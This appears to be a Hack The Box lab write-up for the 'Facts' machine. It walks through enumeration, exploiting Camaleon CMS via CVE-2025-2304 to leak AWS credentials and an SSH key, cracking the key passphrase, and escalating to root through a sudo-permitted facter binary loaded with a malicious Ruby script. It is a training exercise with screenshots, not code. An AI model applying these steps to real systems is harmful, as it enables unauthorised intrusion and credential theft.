---
# System prepended metadata

title: 'HTB Machines :: Facts'

---

# HTB Machines :: Facts Writeup

![image](https://hackmd.io/_uploads/rJQ4S5G9-e.png)

## Reconnaissance

We begin by setting up DNS resolution using  the `etc/hosts` file and conducting an *nmap* scan to enumerate the open ports.

### Network Scan 

Initial `nmap` scan shows port 80, 1433, and 5985 is open, showing that the machine is hosting a webserver and a Microsoft SQL database

![image](https://hackmd.io/_uploads/rksTIqf5be.png)

## Enumeration

### Website Enumeration

Checking `http://facts.htb` shows a trivia website, however there is nothing interesting here.

![image](https://hackmd.io/_uploads/SJ9t89M5Wx.png)
![image](https://hackmd.io/_uploads/SJejL5GqZx.png)


### Subdomain Enumeration

Using *gobuster*, we enumerated the subdomain and got a few hits, most notably `/admin`.

![image](https://hackmd.io/_uploads/Sy0cwcf9bl.png)

Checking the login page, we can register for an account, so we created a dummy account with the following credentials:

```
johnr : johnr123
```

Looking at the CMS panel, it's hosting a Camaleon CMS v2.9.0

![image](https://hackmd.io/_uploads/rJeR_5zq-x.png)

## Exploitation

Camaleon CMS v2.9.0 is quite outdated, and it's vulnerable to CVE-2025–2304

### CVE-2025–2304

![image](https://hackmd.io/_uploads/ryUaK5GcWl.png)

This CVE is a Post-auth Privilege Escalation and AWS Credential leak, which we can utilize using this [script](https://github.com/Alien0ne/CVE-2025-2304)

![image](https://hackmd.io/_uploads/BkXBcqMq-g.png)

Listing the S3 bucket shows an SSH private key, which we can use to login via SSH

![image](https://hackmd.io/_uploads/r157o5G5Zg.png)
![image](https://hackmd.io/_uploads/B1sdo5G5Ze.png)

## Privilege Escalation (User)


![image](https://hackmd.io/_uploads/HJlR2cM5bg.png)

Checking the id shows us that it's encrypted, so we'll have to decrypt it first using ssh2john and hashcat to get the credentials: `dragonballz`.

![image](https://hackmd.io/_uploads/HyZo1oG5Zl.png)

And we're in. However, the user flag is not in the `trivia` folder. Checking the `/home` directory for users, we can see `william`, so we retrieved the flag from that directory.

![image](https://hackmd.io/_uploads/rks8kjG5Zg.png)

```
User Flag : 17279e4c5b001d5072fbf5c0d5cee4f7
```

## Privilege Escalation (Root)

Checking the privileges of `trivia`, we found an interesting program called `/usr/bin/facter`

![image](https://hackmd.io/_uploads/H14ggiz9Wg.png)

After researching a bit, we found that it's a program that lists facts about the system, written in Ruby. We can abuse this by creating a malicious Ruby script and load it using facter

![image](https://hackmd.io/_uploads/HkTu-iMcZe.png)

And we gain root access.

![image](https://hackmd.io/_uploads/ryA9bof5bl.png)

```
Root Flag : 0201aac03c786e1a6740458ee8819116
```